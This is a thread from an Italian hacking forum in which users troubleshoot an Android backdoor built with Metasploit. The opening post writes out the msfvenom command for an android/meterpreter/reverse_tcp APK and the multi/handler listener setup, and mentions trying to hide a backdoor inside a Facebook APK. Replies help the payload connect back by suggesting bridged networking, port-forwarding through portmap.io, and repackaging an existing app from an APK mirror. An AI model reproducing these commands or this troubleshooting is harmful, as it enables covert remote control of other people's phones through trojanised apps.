Discussione Malware problemi con MainActivity APK Payload..

Domoho

Utente Iron
17 Dicembre 2020
25
10
7
19
buongiorno, è da almeno 2 giorni che sto provando a creare una backdoor sottoforma di apk, anzi, in realtà ci son riuscito a crearla, e anche a spostarla sul telefono..il problema è che quando avvio l'exploit, anche se apro l'app dal telefono, non succede nulla..ora vi lascio i comandi qui sotto (kali linux 2020.4)
------------------------
per creare il payload:
---
Codice:
msfvenom -p android/meterpreter/reverse_tcp LHOST=(ip locale) LPORT=4444 R> /var/www/html/provabackdoor.apk
---
una volta spostato dal pc al telefono installo l'apk, è un main activity, nel frattempo mi connetto su metasploit con questi comandi:
---
Codice:
msfconsole
msf> use multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf>set LHOST (ip locale)
msf> set LPORT 4444
msf> exploit
[*] Started reverse TCP handler on 10.0.2.15:4444
----
dopodichè apro l'apk infettato da telefono, ma indovinate? non succede assolutamente nulla, nessuna animazione che si apre, nessun segnale su metasploit, ora non so se il problema è il mio telefono con antivirus, o la backdoor e la connessione ad essa..
inoltre ho provato anche ad infettare un apk normalissimo di facebook con una backdoor creata, il risultato in questione era sbarrato con una "X", non potevo ne drag n dropparlo sul desktop, nè spostarlo su kali linux stesso..
qualcuno mi aiuti D:
 

JunkCoder

Moderatore
5 Giugno 2020
950
18
777
389
Le reti domestiche di solito non usano il range piu' grande 10.x.x.x sei sicuro che sia l'IP locale corretto? Dovresti averlo configurato a mano nel router a meno che non ne hai uno enterprise.
 
  • Mi piace
Reazioni: Helplease

0xbro

Moderatore
24 Febbraio 2017
3,904
150
2,781
1,525
scusa, ti puoi spiegare meglio? per avere un ip locale valido bisogna farlo a mano dal router? come D;
No, ma probabilmente hai la macchina virtuale sotto NAT e non direttamente collegata al router. Ciò vuol dire che il cellulare collegato direttamente al router avrà un indirizzo del tipo 192.168.x.x mentre la tua macchina virtuale sembra avere 10.0.2.15, quindi sembra essere su un'altra rete
 

Domoho

Utente Iron
17 Dicembre 2020
25
10
7
19
No, ma probabilmente hai la macchina virtuale sotto NAT e non direttamente collegata al router. Ciò vuol dire che il cellulare collegato direttamente al router avrà un indirizzo del tipo 192.168.x.x mentre la tua macchina virtuale sembra avere 10.0.2.15, quindi sembra essere su un'altra rete
inizialmente avevo messo un proxy su kali, ho provato a riavviare la scheda di rete e a fare
Codice:
service network restart
ma l'ip locale rimane sempre quello..soluzioni?
Messaggio unito automaticamente:

Che apk stai usando? non fare touch malevolo.apk usa un apk gia esistente, scaricalo da apk mirror
era un apk di facebook già esistente, però non potevo eseguirlo o spostarlo dalla sua cartella
 

crisstftyfyfy

Utente Iron
21 Dicembre 2021
6
2
1
6
scusate ho un problema con metasploit
vi spiego: creo il payload corretto per android, lo condivido con telefono android lo scarico abilito tutto ma non si apre e non si collega con metasploit. l'ip che ho usato è quello trovato con ifconfig
 

wesker1998

Utente Silver
17 Gennaio 2022
106
32
64
92
Hai 2 soluzioni:
1. Quello sembra decisamente un Indirizzo IP di tipo NAT (sei su virtualbox caro?), in questo caso vai sulla tendina di VirtualBox e passa a Bridged Adapter;
2. Portmap.io